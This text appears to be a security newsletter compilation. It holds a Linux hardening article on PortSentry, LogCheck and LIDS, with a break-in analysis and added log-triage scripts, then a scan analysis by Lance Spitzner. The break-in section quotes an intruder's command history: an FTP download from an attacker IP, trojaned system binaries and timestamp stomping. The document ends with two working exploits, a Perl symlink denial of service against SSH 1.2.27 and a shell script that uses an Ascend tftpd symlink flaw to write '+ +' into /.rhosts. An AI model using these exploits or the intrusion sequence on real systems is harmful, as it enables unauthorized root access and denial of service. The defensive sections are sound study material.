Each layer in the diagram provides additional data protection to the layers above it. For example, the first layer is the firewall. Should an intrusion attempt not be defeated by the firewall, a second layer, the Port Sentry program,
can provide additional protection.
Further inside the security system are the LIDS and LogCheck programs, that provide additional protection should an intrusion attempt not be intercepted by the Port Sentry program.
Monitoring Incoming Connections
The first layer of protection behind the firewall is a software package that will monitor incoming attempts to connect to the machine. The PortSentry package (http://www.psionic.com/abacus/portsentry/) provides a simple and
effective method of doing this.
What does PortSentry do?
PortSentry is a program that monitors activity on specific TCP/IP ports. Activity on the ports that are monitored by PortSentry is reported, and one of several options can be taken, including denying further attempts to access to
your system from the source of the activity. This is an important defence mechanism, because a hacker will typically probe your system for weaknesses ("port scanning") before attempting an intrusion. Detecting the probe or port
scan, and completely denying further access to your system by a potential hacker, robs that hacker of the ability to follow up on any port scans with a real intrusion attempt.
Installing PortSentry
For users of Red Hat Linux, PortSentry is available in RPM format on the Red Hat contrib FTP site. This site is mirrored in various locations around the world, check at www.redhat.com for the location of your nearest mirror. I
haven't yet determined the availability of a .deb format package for PortSentry but I am sure there is one out there.
For other Linux systems, installing PortSentry from the source code is relatively simple.
Recommended Configuration
PortSentry runs in a number of modes, including various TCP and UDP stealth modes. The mechanism that I prefer to use for running PortSentry is to bind it to a TCP port that (a) is not in use, and (b) is known in some systems to
have potential for intrusion attempts. For example, port 143 (imap2), port 111 (portmap) and port 23 (telnet) are TCP ports that I do not use on my internet systems, and my web server was scanned on both of those ports in the
last 24 hours.
To start PortSentry in basic TCP mode, ensure that your system start-up scripts run this command somewhere:
portsentry -tcp
Also, ensure that the PortSentry config file (portsentry.conf) contains a TCP_PORTS line enabling scanning on the ports that you require.
Response Options
The "Response Options" section of the portsentry.conf file allows you to specify what response that PortSentry will take on detecting unwanted activity. The mechanism that I normally choose is to use ipchains to block further
access from the source of the activity. This is done by uncommenting the following line in the portsentry.conf file:
KILL_ROUTE="/sbin/ipchains -I input -s $TARGET$ -j DENY -l"
On systems that receive a high level of port scanning activity, removing the "-l" at the end of the above line will prevent logging of further incoming connections, which might be useful to save space in the log files.
Monitoring System Logs
Firewalling systems, and software like PortSentry perform one useful function, in that they monitor and prevent connections coming in to unwanted ports on the system. This can prevent access to a system via a standard
scan-and-intrude method.
Where a system is required to run a particular service (eg: Apache on a web server, or BIND on a DNS server), and a hacker has uncovered a particular loophole in the service, these programs will unfortunately not achieve the
result of keeping all intruders out of the system. A system acting as a DNS server that has a vulnerable copy of BIND running on it will eventually be discovered by a hacker that scans a wide range of machines for a single port
(the DNS port) on each machine, and attempts intrusion against that port only. The firewall and PortSentry will unfortunately see this intrusion attempt as a legitimate access to the system.
LogCheck
LogCheck (http://www.psionic.com/abacus/logcheck/) is a useful program for scanning system logs for unusual activity. LogCheck works by scanning the various system log files (under Linux these are located in /var/log), and
notifying the system administrator by e-mail if there is any unusual activity. Unusual messages in the log files can often be generated by intrusion attempts, or actual intrusions against your system.
Installing LogCheck
LogCheck is available in RPM format from the Red Hat contrib archives, and from the same sources as PortSentry. Installing LogCheck from the RPM file or from the source code (read the INSTALL file provided with the source
code) is relatively simple.
Configuring LogCheck
LogCheck has four main configuration files. In the RPM version, these are stored in the /etc/logcheck directory. Normally, only the logcheck.ignore and the logcheck.violations.ignore files need modification. The normal process
that I go through after installing LogCheck is as follows:
1. Allow LogCheck to run once with the standard configuration files. This will produce a large output file, which can be thrown away.
2. 24 hours later, allow LogCheck to run again. This will detect any new entries in the log files since the last run, and will produce a smaller but still sizeable output file. Read this file carefully.
3. For entries in the file that are of no great concern (use your judgement for this) find a specific identifying string in the entry. For entries that are in the "Security Violations" section, add the identifying string to the logcheck.violations.ignore file. For other entries (in the "Unusual System Events" section), add the string to the logcheck.ignore file.
4. Repeat this process, once every 12 - 24 hours for approximately a week. By this stage, enough "bogus" entries will be filtered out by the strings that you have added to the .ignore files that the daily LogCheck report will contain only genuine system concerns.
Note that the RPM file specifies that LogCheck is to be run hourly, but normally I only run it daily except on critical systems that need regular monitoring. This is done by moving the /etc/cron.hourly/logcheck file into /etc/cron.daily.
Kernel Based Intrusion Detection
Kernel based intrusion detection is a relatively new art form for Linux. The main kernel based intrusion detection system currently available is called LIDS, and is available from http://www.lids.org/.
What is LIDS?
LIDS is an intrusion detection and prevention system that resides within the Linux kernel.
LIDS' protection is aimed at preventing the root user (who would normally have access to the entire system) from tampering with important parts of the system. LIDS' most important features include increased file system
protection, protection against direct port access or direct memory access, protection against raw disk access, and protection of log files. LIDS also prevents certain system actions, such as installing a packet sniffer or changing
firewall rules.
LIDS Documentation
The LIDS system is somewhat more complex to install than either PortSentry or LogCheck. Fortunately, the LIDS web site contains quite good documentation on the LIDS project, including installation and configuration
instructions.
Installing LIDS
First, before installing LIDS, make sure that you have the most up to date LIDS patch (I am using 0.9), and the correct kernel version. I am using the updated kernel (2.2.14-12) from the Red Hat Updates FTP site, because this
contains some security fixes. You also need the source code for the kernel that you are using.
LIDS is currently targeted towards the 2.2.14 kernels. I installed LIDS on a Red Hat 6.2 system, this includes the 2.2.14 kernel. Before I installed LIDS, I obtained the updated kernel (from ftp.redhat.com/updates/ or one of its
mirrors) and installed it according to the instructions at http://www.redhat.com/support/docs/howto/kernel-upgrade/kernel-upgrade.html.
The next thing I obtained was the updated kernel source, which also came from ftp.redhat.com/updates/ This I installed using:
rpm -Uhv kernel-source-2.2.14-12.i386.rpm
Next, compile and install the lidsadm program:
cd /usr/local/src/security/lids-0.9/lidsadm-0.9
make
make install
Generate a RipeMD-160 password that will later be installed into the kernel:
lidsadm -P
I entered the password "anypass" and got back the key "d502d92bfead11d1ef17887c9db07a78108859e8".
Next, I copied the standard Red Hat configuration file for my architecture into the /usr/src/linux directory:
cd /usr/src/linux/configs/
cp kernel-2.2.12-i686.config ..
Next, I installed the LIDS patch using the following commands:
cd /usr/src
patch -p0 </usr/local/src/security/lids-0.9/lids-0.9-2.2.14-redhat.patch
Note that the Red Hat supplied kernel is slightly different from the standard 2.2.14 kernel distributed by Linus, as it contains some updated drivers. The lids-0.9-2.2.14-redhat.patch file that is available is slightly different to the standard
lids-0.9-2.2.14.patch file distributed with LIDS, as the latter will not apply cleanly to Red Hat's kernel.
Finally, I configured, compiled, and installed the kernel:
cd /usr/src/linux
make menuconfig
make dep; make clean
make install; make modules; make modules_install
The following script shows the LIDS configuration options that I chose during the kernel configuration:
[*] Linux Intrusion Detection System support (EXPERIMENTAL)
--- LIDS features
[ ] Hang up console when raising a securit alert
[*] Security alert when execing unprotected programs before sealing
[ ] Do not execute unprotected programs before sealing LIDS
[*] Enable init children lock feature
[*] Try not to flood logs
(60) Authorised time between two identic logs (seconds)
[*] Allow switching LIDS protections
RipeMD-160 encrypted password: d502d92bfead11d1ef17887c9db07a78108859e8
(3) Number of attempts to submit password
(3) Time to wait after a fail (seconds)
[*] Allow remote users to switch LIDS protections
[ ] Allow any program to switch LIDS protections
[*] Allow reloading config. file
[ ] Hide some known processes
[*] Port Scanner Detector in kernel
[ ] Send security alerts through network
--- Special authorizations
[ ] Allow some known processes to access /dev/mem (xfree, etc.)
[ ] Allow some known processes to access raw disk devices
[ ] Allow some known processes to access io ports
[ ] Allow some known processes to change routes
--- Special UPS
[*] Allow some known processes to unmount devices
Allowed processes: "/etc/rc.d/init.d/halt;/etc/rc.d/init.d/netfs"
[*] Unmounting capability is inherited
[*] Allow some known processes to kill init children
Allowed processes: "/etc/rc.d/init.d/halt"
[*] Killing capability is inherited
Note that since I don't have a UPS, am running a headless server (no X installed), and need to access this system remotely, I chose the configuration options above. The options that you choose for your environment may vary.
Configuring LIDS
One important note: After compiling the kernel you must configure LIDS before you next reboot!
LIDS stores its configuration in the /etc/lids.conf file. This file should never be edited by hand, instead, you should configure LIDS by using the lidsadm program.
Running "lidsadm -h" gives a page or so of help as to how to use the lidsadm program. The LIDS documentation (on the LIDS web site) gives some examples of using LIDS to protect files, for example:
lidsadm -A -r /sbin
... which protects (marks read-only) the entire /sbin directory.
My preferred LIDS configuration script looks like this:
lidsadm -Z
lidsadm -A -r /usr/bin
lidsadm -A -r /bin
lidsadm -A -r /usr/sbin
lidsadm -A -r /sbin
lidsadm -A -r /usr/X11R6/bin
lidsadm -A -r /etc/rc.d
lidsadm -A -r /etc/sysconfig
Once the LIDS system has been configured, you need to update your boot scripts to ensure that the "lidsadm -I" command is run during the boot process. This effectively "starts" the LIDS functions in the kernel. I normally place
lidsadm at the end of the /etc/rc.d/rc.local script, as this ensures that the LIDS functionality doesn't prevent the rest of the system scripts from operating correctly.
This is the command line that I use at the end of /etc/rc.d/rc.local to start LIDS:
/sbin/lidsadm -I -- -CAP_SYS_MODULE -CAP_SYS_RAWIO -CAP_SYS_ADMIN \
-CAP_SYS_PTRACE -CAP_NET_ADMIN -CAP_LINUX_IMMUTABLE \
+INIT_CHILDREN_LOCK
Configuring LILO
Note that since the Kernel was updated using Red Hat's RPMs, you will need to follow the instructions in the Red Hat kernel upgrading web page mentioned above to modify the /etc/lilo.conf file. This will ensure that the new kernel
that has been compiled with LIDS functionality will be the one booted when your system reboots.
After Reboot
After the next reboot, LIDS will be running on your system. If you need to stop LIDS to perform system administration tasks, then you should use one of the following commands:
/sbin/lidsadm -S -- -LIDS
or
/sbin/lidsadm -S -- -LIDS_GLOBAL
You will need to provide the LIDS password, which was inserted into the kernel in RipeMD-160 format during the kernel compile.
You will also note that on shutdown, most of the shutdown scripts will fail. This is normal. The final shutdown script (/etc/rc.d/init.d/halt) will kill all of the processes and unmount the file systems. No other process will be allowed to
kill any of the children of the init() process, due to the "+INIT_CHILDREN_LOCK" protection made in the rc.local file (above).
Also, every 10 minutes, you will get an error message about "rmmod -as" being unable to remove a module. This is because the "-CAP_SYS_MODULE" protection stops insertion or removal of modules once LIDS has started. To
stop the error message happening, delete the /etc/cron.d/kmod file.
What Can LIDS Protect?
A quick read through the LIDS documentation will reveal the full set of features in LIDS. The most important features, in my opinion, include the following:
CAP_LINUX_IMMUTABLE, which protects the files and file systems from being written to when marked "immutable".
CAP_NET_ADMIN, which prevents tampering with the network configuration (eg: prevents route table entries from being changed, and prevents firewall entries from being tampered with).
CAP_SYS_MODULE which prevents insertion and removal of kernel modules.
CAP_SYS_RAWIO which prevents raw disk/device I/O.
CAP_SYS_ADMIN which prevents a large range of other system administration functions.
INIT_CHILDREN_LOCK which prevents child processes of the init() master process from being tampered with.
All of the above features can be turned on at any point using "lidsadm -I". The features can also be disabled at any point (to allow the real system administrator access to the system configuration) by using "lidsadm -S", and
providing the LIDS password which was installed into the kernel (and encrypted with RipeMD-160).
Anatomy of a Break In
I was recently asked to examine a system that had been hacked, to determine the cause of the break-in, and to determine what damage the hacker had done to the system. Fortunately, the system was hacked by someone who
was not particularly clever, and didn't manage to conceal their tracks entirely.
The break-in occurred when the hacker overflowed the buffer of a system daemon running as root (in fact one that should not have been running on the system at all, but the person who installed Linux was careless and left it
running, and also failed to install Red Hat's released updates which would have fixed the buffer overflow problem). The hacker, however, was also careless in that when they managed to open a shell (BASH) on the hacked system
following the break-in, they forgot that the BASH shell logs all activity to a .bash_history file for use by the command line recall functions. A simple read through /.bash_history revealed exactly what the hacker had done while
logged on to the system.
The file read as follows (edited slightly for brevity):
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
Reading through this file, we can note the following activity:
1. A directory with an unusual name (/usr/lib/...) was created on the system. An FTP connection was made back to the hacker's personal machine (200.192.58.201, traced to a dial-in address somewhere in Brazil), and a simple hacker-kit was downloaded.
2. The hacker kit was uncompressed. It contained trojan binaries which were then installed on the system.
3. The trojan binaries were used to over-write the system versions of netstat, ps, tcpd, syslogd, and pstree. These are programs that get used to report on system activity, show running processes, show open ports, etc.
4. A backdoor process of some kind (/usr/lib/pt07) was installed and started. Note that since the hacker has installed his or her own versions of ps, pstree, and netstat, this trojan is probably invisible to the system.
What Can We Learn From This?
Firstly, note that LIDS would not have prevented the actual break-in. The hacker obtained root access to the machine by connecting to and overflowing a buffer in a process that was running as root.
Once the hacker had broken in, we can note how LIDS would have minimised the damage:
LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented the trojan binaries from being written to /bin, /usr/bin, /usr/sbin, and /usr/lib. These are directories that we would normally mark as immutable (chattr
+i) and hence could not have been changed. Note that even without LIDS we can mark these directories as immutable using chattr +i, but LIDS prevents even the root user from tampering with the immutable flag.
Similarly, the touch -t commands would have failed if the files were marked chattr +i.
Even the very first line of the script, "mkdir /usr/lib/..." would have failed if the /usr/lib directory was marked immutable!
Note that LIDS would not have prevented the break-in, but would have prevented the hacker from causing any significant system damage after the break-in. A backdoor process could have been installed (eg: the pt07 backdoor
could have been placed in /tmp, or any other non-immutable directory), but the non-trojan versions of ps, netstat, and pstree would have detected this process fairly easily and we could have come back and killed it off.
Without LIDS being installed we have no other real clues as to what the hacker might have done via this backdoor, and so our only available method to clean up the hacker's damage is to re-install the system completely.
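The reading of the history file done by eye above can be scripted. This is an added example, not code from the article or from LIDS: it walks the quoted history and reports hidden directories, timestamp changes, and writes that land in a protected directory. PROTECTED is an assumption built from the article's lidsadm -A -r list plus /usr/lib from the chattr +i paragraph, the function names are hypothetical, and the check is path matching only.

```python
import posixpath
import re
import shlex
from collections import Counter

# Assumed protected set: the article's lidsadm -A -r list, plus /usr/lib from
# the chattr +i paragraph. Path matching only; LIDS itself is not modelled.
PROTECTED = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib",
             "/usr/X11R6/bin", "/etc/rc.d", "/etc/sysconfig")

# The history excerpt quoted in the article, embedded so the script runs offline.
HISTORY = """\
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
"""

TIME_OPTS = ("-t", "-d", "-r")  # touch options that set an explicit timestamp


def _under(path, roots):
    return any(path == r or path.startswith(r + "/") for r in roots)


def _written_paths(argv):
    """Paths a command would create or modify (mv, cp, mkdir, touch, redirects)."""
    cmd, paths, plain = posixpath.basename(argv[0]), [], []
    tokens = iter(argv[1:])
    for tok in tokens:
        if tok.startswith(">"):                  # "> f", ">> f" or ">f"
            target = tok.lstrip(">") or next(tokens, "")
            if target:
                paths.append(target)
        else:
            plain.append(tok)
    operands = [a for a in plain if not a.startswith("-")]
    if cmd in ("mv", "cp") and len(operands) >= 2:
        paths.append(operands[-1])               # destination file or directory
    elif cmd == "mkdir":
        paths.extend(operands)
    elif cmd == "touch":                         # drop the value given to -t/-d/-r
        stamp = {plain[i + 1] for i, a in enumerate(plain[:-1]) if a in TIME_OPTS}
        paths.extend(a for a in operands if a not in stamp)
    return paths


def triage(history, protected=PROTECTED):
    """Return (line number, finding, path) tuples for a shell history text."""
    findings, cwd = [], "/<unknown-cwd>"         # relative paths stay unmatched until a cd
    for lineno, line in enumerate(history.splitlines(), 1):
        for segment in re.split(r"[;|]", line):  # naive split: ignores quoting
            try:
                argv = shlex.split(segment)
            except ValueError:
                argv = segment.split()
            if not argv:
                continue
            cmd = posixpath.basename(argv[0])
            if cmd == "cd" and len(argv) > 1:
                cwd = posixpath.normpath(posixpath.join(cwd, argv[1]))
                continue
            stomp = cmd == "touch" and any(a in TIME_OPTS for a in argv[1:])
            for p in _written_paths(argv):
                path = posixpath.normpath(posixpath.join(cwd, p))
                if stomp:
                    findings.append((lineno, "timestomp", path))
                if cmd == "mkdir" and any(re.fullmatch(r"\.{3,}", c) for c in path.split("/")):
                    findings.append((lineno, "hidden-dir", path))
                if _under(path, protected):
                    findings.append((lineno, "protected-write", path))
                elif _under(path, ("/etc",)):
                    findings.append((lineno, "unprotected-etc-write", path))
    return findings


def summary(findings):
    return Counter(kind for _, kind, _ in findings)


if __name__ == "__main__":
    print(summary(triage(HISTORY)))
```

On the quoted history the replacement of /etc/inetd.conf is reported as unprotected-etc-write, because the assumed list covers /etc/rc.d and /etc/sysconfig but not /etc itself.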
OpenWall and LIDS: An Extra Layer
Another similar system to LIDS is the OpenWall project (http://www.openwall.com/linux/). The OpenWall project contains some different security features to LIDS, and one of the OpenWall patches in particular makes the stack area
non-executable. An excerpt from the OpenWall README file states:
Most buffer overflow exploits are based on overwriting a function's return address on the stack to point to some arbitrary code, which is also put onto the stack. If the stack area is non-executable, buffer overflow
vulnerabilities become harder to exploit.
Another way to exploit a buffer overflow is to point the return address to a function in libc, usually system(). This patch also changes the default address that shared libraries are mmap()'ed at to make it always contain
a zero byte. This makes it impossible to specify any more data (parameters to the function, or more copies of the return address when filling with a pattern), -- in many exploits that have to do with ASCIIZ strings.
Recently, the LIDS web site has contained some integrated LIDS + OpenWall kernel patches that apply the security features of both LIDS and OpenWall to the kernel in a single integrated patch set.
Conclusions
Using a set of layered security tools on the Linux system, it is possible to prevent a wide range of system attacks, and to protect your system against intrusion or tampering. A hacker's point of entry into your system will be the
network interfaces, and protecting these, and under the network interfaces, the system kernel, can discourage many attacks and prevent others.
Be aware of any potential security holes in your system. Any daemon or service running on your system, either as root or as a non-root user, can be a potential security threat. Be prepared to face attacks against these threats.
David Elson (Del) is a security and technology consultant working for Wang New Zealand in Christchurch, on the South Island of New Zealand. With 15 years IT experience, he consults to various clients on security and networking issues. He also maintains a set of web pages on Linux and other related
security topics, and has given talks on various security and networking issues at conferences in Australia and New Zealand.
@HWA
232.0 [IND] scan.txt Spitzner gets an unusual scan.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Recently my network received an unusual scan; deciphering
it has proven difficult. With some outstanding help
from the security community, here is my best guess at
what the scan is.
THE SCAN
--------
On 20 May, one of my systems received a unique scan from
three systems. The three systems are:
jive.rahul.net (192.160.13.4)
bug.rahul.net (192.160.13.7)
foxtrot.rahul.net (192.160.13.6)
The scan signature is exactly the same from all three systems,
they scanned ports 1-1024 (see signature below). Of these
three systems, one is not active (jive.rahul.net) so we
know for certain that at least one system was spoofed. The
other two systems (bug and foxtrot) are up. This was confirmed
both by hping and by the system owner, Rahul Dhesi <dhesi@rahul.net>
However, I do not know if the two live systems were spoofed or not.
--- snort snort ---
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
.
.
.
05/20-17:06:58.685879 192.160.13.4:31337 -> 172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
--- snip snip ---
THE TOOL
--------
These packets were crafted by a tool, they were not created by
a standard IP stack. We can determine this based on the following:
1. The Seq, Ack, and IP ID numbers are the same for all 1024 packets.
An IP stack would have increasing numbers for all three.
2. Note the TCP flags, FIN, RST, and PSH. No standard IP stack would
produce such a packet, nor would any IP stack respond with such a packet.
Many people commented that this was Back Orifice because of the 31337 port,
but that is not the case. First, BO uses UDP by default. Also, Dildog had
this to say about the scan:
"A bo2k scanner would never come -from- port 31337. Something might scan
-you- for sockets listening on 31337, but not the other way around.
Regardless, this would have been BO, not BO2K, since BO2K doesn't have
a default port. This just looks like a regular port scan to me with a
fixed local port."
So, this scan was most likely done by a scanner that creates its own packets,
but which one?
Not nmap: Nmap does not have a FRP flag option. Nor does it use constant
Seq, Ack, and IP ID numbers.
Not hping: Hping can set most of the functionality of this scan, but it CANNOT
set the Seq or Ack number.
The best guess we have among the security community is these signatures were
created by Libnet; someone has created their own packets. Why Libnet?
To quote Simple Nomad (and Aaron Campbell):
"I thought these values looked familiar. Took me a bit, but check out the
sample programs that come with Libnet. In there you will find id 242, seq
a1d95, ack 53, and a ttl of 48. Looks like someone was playing around
trying to write a scanner of sorts using the Libnet sample progs as a
starting point, and scanned you. So check every machine 4 hops away...."
NOTE: I tried the traceroute 4 hops out, it was a router, most likely not
our suspect :(
So, based on what we know, our best guess is that Libnet was used to create
these packets.
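The two tells listed above (identical Seq, Ack and IP ID on every probe, and the FIN+RST+PSH flag set) can be checked mechanically over Snort text output. The Python below is an added example, not part of the original write-up: the third probe and the 10.0.0.5 client records are constructed, and the three-port threshold and finding names are assumptions.

```python
import re
from collections import defaultdict

# First and last records copied from the capture shown above, filler dots included.
PAGE_RECORDS = """\
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
.
.
.
05/20-17:06:58.685879 192.160.13.4:31337 -> 172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
"""

# Constructed records: one more probe in the same style, plus three SYNs from
# an ordinary client (10.0.0.5 is a made-up address) for contrast.
CONSTRUCTED_RECORDS = """\
05/20-17:06:51.000000 192.160.13.4:31337 -> 172.16.1.101:512
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
05/20-17:07:01.000000 10.0.0.5:1045 -> 172.16.1.101:22
TCP TTL:61 TOS:0x0 ID:4101
**S***** Seq: 0x3C1A0001 Ack: 0x0 Win: 0x7D78
05/20-17:07:02.000000 10.0.0.5:1046 -> 172.16.1.101:25
TCP TTL:61 TOS:0x0 ID:4102
**S***** Seq: 0x3C1B22F0 Ack: 0x0 Win: 0x7D78
05/20-17:07:03.000000 10.0.0.5:1047 -> 172.16.1.101:80
TCP TTL:61 TOS:0x0 ID:4103
**S***** Seq: 0x3C1C9A10 Ack: 0x0 Win: 0x7D78
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
HEADER_RE = re.compile(rf"^(\S+)\s+({IPV4}):(\d+)\s+->\s+({IPV4}):(\d+)\s*$")
IP_RE = re.compile(r"^TCP\s+TTL:(\d+)\s+TOS:(\S+)\s+ID:(\d+)")
TCP_RE = re.compile(r"^(\S+)\s+Seq:\s*(0x[0-9A-Fa-f]+)\s+Ack:\s*(0x[0-9A-Fa-f]+)")

# Flag pairs that contradict each other and that a normal stack does not send.
CONTRADICTORY = [frozenset("FR"), frozenset("SF"), frozenset("SR")]


def parse_snort(text):
    """Turn three-line Snort text records into a list of packet dicts."""
    packets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = HEADER_RE.match(line)
        if m:
            cur = {"ts": m[1], "src": m[2], "sport": int(m[3]),
                   "dst": m[4], "dport": int(m[5])}
            continue
        if cur is None:
            continue                      # filler such as "." between records
        m = IP_RE.match(line)
        if m:
            cur.update(ttl=int(m[1]), ip_id=int(m[3]))
            continue
        m = TCP_RE.match(line)
        if m and "ip_id" in cur:
            # Flag field is a fixed-width mask; '*' marks an unset bit.
            cur.update(flags=frozenset(m[1].replace("*", "")),
                       seq=int(m[2], 16), ack=int(m[3], 16))
            packets.append(cur)
            cur = None
    return packets


def analyze(packets, min_ports=3):
    """Return {source_ip: [findings]} for sources that look tool-generated."""
    by_src = defaultdict(list)
    for p in packets:
        by_src[p["src"]].append(p)
    report = {}
    for src, pkts in by_src.items():
        findings = set()
        if any(combo <= p["flags"] for p in pkts for combo in CONTRADICTORY):
            findings.add("contradictory-flags")
        if len({p["dport"] for p in pkts}) >= min_ports:
            # A real stack changes Seq and IP ID between connections.
            if len({(p["seq"], p["ack"], p["ip_id"]) for p in pkts}) == 1:
                findings.add("constant-seq-ack-id")
            if len({p["sport"] for p in pkts}) == 1:
                findings.add("fixed-source-port-sweep")
        if findings:
            report[src] = sorted(findings)
    return report


if __name__ == "__main__":
    for src, findings in analyze(parse_snort(PAGE_RECORDS + CONSTRUCTED_RECORDS)).items():
        print(src, ", ".join(findings))
```

Because the source addresses in a scan like this may be spoofed, the findings describe the traffic, not the owner of the address.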
PURPOSE OF THE SCAN
-------------------
This is the most confusing part: the TCP flags FRP do not generate a response
from open or closed ports. This has been tested on a variety of systems by
several people, including Max Vision, Denis Ducamp, and myself. So
why run a scan when you won't get any results? I do not know. Maybe
someone was testing their coding or scanning skills. Perhaps they were
trying "man-in-the-middle" scan techniques. We may never know :(
K2 from ADM CREW has an interesting theory
"Well, not really, what if you're not using the TCP/IP stack of the OS but rather
something like libpcap backdoor and are looking for weirdo options ( this will
enable you to communicate through onto a firewall'd system )... he does use
libnet to communicate with it so it leads me to believe that he wants to have a
sub-carrier connection that is not normally valid. Source port significance is
a really good way to authenticate to a backdoor (ip independent), and can be
detected by the trojan early (able to bypass system logging).
Exactly, libpcap based backdoor with a libnet based client to pipe i/o to the
backdoor... I don't know why they would scan all the ports other than to assume
that the backdoor on the host may modulate the port it's listening on... also, a
system like this could listen on a port already allocated by the system like
even if telnetd is running... you can still contact your backdoor on port 23
because your connect to that port is not valid to anything that the system would
have there (you're basically going up your libpcap stack instead of the OS), this
also helps get past any host firewall."
A comment from the system owner Rahul Dhesi, who has been extremely
helpful with this analysis.
"Hi, I don't see any obvious signs of a break-in on bug.rahul.net
or foxtrot.rahul.net. Also, they are running different OSs:
foxtrot is SunOS 4.1.3_U1, while bug is FreeBSD 3.4-STABLE.
It seems doubtful to me that somebody would break into two machines
running different OSs at around the same time. if somebody really
broke into one of them, he would likely attack other machines
on the network running the same OS. So I'm guessing that all
packets were spoofed."
Side note, FRP packets are not entered in the state table for FW-1
firewall. Even though the packet may be accepted and logged, the packet
would not enter the FW-1 state table.
ADDENDUM
--------
If you have any comments or words of wisdom you would like to add, please
email me at Lance Spitzner <lance@spitzner.net>. Also, I have posted the
raw data (tcpdump/snort binary format). You can download it at
http://www.enteract.com/~lspitz/scan.gz
Thanks to the following people for their help and ideas:
Nelson Murilo <nelson@pangeia.com.br>
Bill Pennington <billp@rocketcash.com>
Aaron Campbell <aaron@cs.dal.ca>
Denis Ducamp <Denis.Ducamp@hsc.fr>
Simple Nomad <thegnome@nmrc.org>
K2 ADM CREW
... and the many others who sent their ideas
@HWA
233.0 [IND] local ssh 1.2.27 dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/daem0n/ssh/socket-dos.pl
#!/usr/bin/perl
#
# vulnerable: SSH 1.2.27
#
# A vulnerability in SSH's creation of the authentication
# agent UNIX domain socket allows local users to create a
# UNIX domain socket with an arbitrary file name in the
# system.
#
# SSH has the concept of authentication proxying via the
# SSH authentication agent. It allows for a basic kind of
# Single Sign-On capability. The sshd daemon, ssh and ssh
# -agent communicate via a UNIX domain socket normally of
# the form '/tmp/ssh-<username>/agent-socket-<pid>'.
#
# SSH follows symbolic links while creating the socket as
# root thus allowing any local users with ssh access to
# create a socket with an arbitrary filename in the
# system.
#
# Notice that this will not work under all operating
# systems. Some operating systems do not follow symbolic
# links during bind on UNIX domain sockets. Linux 2.0.x,
# Solaris 2.5.1 and IRIX 6.5.2 do not follow symbolic
# links during bind(2). Linux 2.1.x does.
$pid = $$;
$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);
for ($i = $pid; $i < $pid+50; $i++)
{
symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
# www.hack.co.za [23 May]#
@HWA
234.0 [IND] ascend router remote exploit by loneguard.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/ascend/tftp.sh
#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
# The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000
# network devices creates a log in /tmp called tftpd_xfer_status.log.
#
# If /tmp/tftpd_xfer_status.log already exists as a symbolic link,
# tftpd will follow it and overwrite any data it points to (it runs
# as root). It is possible for an attacker to link the log file to a
# file like /.rhosts to compromise elevated privileges on the device.
#
# It should be made clear that since this is a network device
# vulnerability, the consequences of compromise could be much greater
# to the network the device is on as a whole than if it were a single
# regular host.
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
# www.hack.co.za [23 May]#
